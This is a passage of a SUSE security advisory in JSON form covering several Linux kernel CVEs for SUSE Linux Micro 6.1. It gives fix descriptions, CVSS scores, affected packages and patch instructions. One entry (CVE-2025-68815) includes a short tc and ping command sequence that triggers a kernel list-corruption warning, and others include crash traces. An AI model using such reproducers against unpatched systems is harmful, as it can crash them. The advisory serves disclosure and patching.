"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68808"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-68814",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68814"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix filename leak in __io_openat_prep()\n\n __io_openat_prep() allocates a struct filename using getname(). However,\nfor the condition of the file being installed in the fixed file table as\nwell as having O_CLOEXEC flag set, the function returns early. At that\npoint, the request doesn\u0027t have REQ_F_NEED_CLEANUP flag set. Due to this,\nthe memory for the newly allocated struct filename is not cleaned up,\ncausing a memory leak.\n\nFix this by setting the REQ_F_NEED_CLEANUP for the request just after the\nsuccessful getname() call, so that when the request is torn down, the\nfilename will be cleaned up, along with other resources needing cleanup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68814",
"url": "https://www.suse.com/security/cve/CVE-2025-68814"
},
{
"category": "external",
"summary": "SUSE Bug 1256651 for CVE-2025-68814",
"url": "https://bugzilla.suse.com/1256651"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68814"
},
{
"cve": "CVE-2025-68815",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68815"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Remove drr class from the active list if it changes to strict\n\nWhenever a user issues an ets qdisc change command, transforming a\ndrr class into a strict one, the ets code isn\u0027t checking whether that\nclass was in the active list and removing it. This means that, if a\nuser changes a strict class (which was in the active list) back to a drr\none, that class will be added twice to the active list [1].\n\nDoing so with the following commands:\n\ntc qdisc add dev lo root handle 1: ets bands 2 strict 1\ntc qdisc add dev lo parent 1:2 handle 20: \\\n tbf rate 8bit burst 100b latency 1s\ntc filter add dev lo parent 1: basic classid 1:2\nping -c1 -W0.01 -s 56 127.0.0.1\ntc qdisc change dev lo root handle 1: ets bands 2 strict 2\ntc qdisc change dev lo root handle 1: ets bands 2 strict 1\nping -c1 -W0.01 -s 56 127.0.0.1\n\nWill trigger the following splat with list debug turned on:\n\n[ 59.279014][ T365] ------------[ cut here ]------------\n[ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0.\n[ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220\n[ 59.280860][ T365] Modules linked in:\n[ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary)\n[ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n[ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220\n[ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 \u003c0f\u003e 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44\n...\n[ 59.288812][ T365] Call Trace:\n[ 59.289056][ T365] \u003cTASK\u003e\n[ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80\n[ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0\n[ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10\n[ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240\n[ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10\n[ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.292313][ T365] ? trace_contention_end+0xc8/0x110\n[ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0\n\nFix this by always checking and removing an ets class from the active list\nwhen changing it to strict.\n\n[1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68815",
"url": "https://www.suse.com/security/cve/CVE-2025-68815"
},
{
"category": "external",
"summary": "SUSE Bug 1256680 for CVE-2025-68815",
"url": "https://bugzilla.suse.com/1256680"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68815"
},
{
"cve": "CVE-2025-68816",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68816"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fw_tracer, Validate format string parameters\n\nAdd validation for format string parameters in the firmware tracer to\nprevent potential security vulnerabilities and crashes from malformed\nformat strings received from firmware.\n\nThe firmware tracer receives format strings from the device firmware and\nuses them to format trace messages. Without proper validation, bad\nfirmware could provide format strings with invalid format specifiers\n(e.g., %s, %p, %n) that could lead to crashes, or other undefined\nbehavior.\n\nAdd mlx5_tracer_validate_params() to validate that all format specifiers\nin trace strings are limited to safe integer/hex formats (%x, %d, %i,\n%u, %llx, %lx, etc.). Reject strings containing other format types that\ncould be used to access arbitrary memory or cause crashes.\nInvalid format strings are added to the trace output for visibility with\n\"BAD_FORMAT: \" prefix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68816",
"url": "https://www.suse.com/security/cve/CVE-2025-68816"
},
{
"category": "external",
"summary": "SUSE Bug 1256674 for CVE-2025-68816",
"url": "https://bugzilla.suse.com/1256674"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68816"
},
{
"cve": "CVE-2025-68819",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68819"
}
],
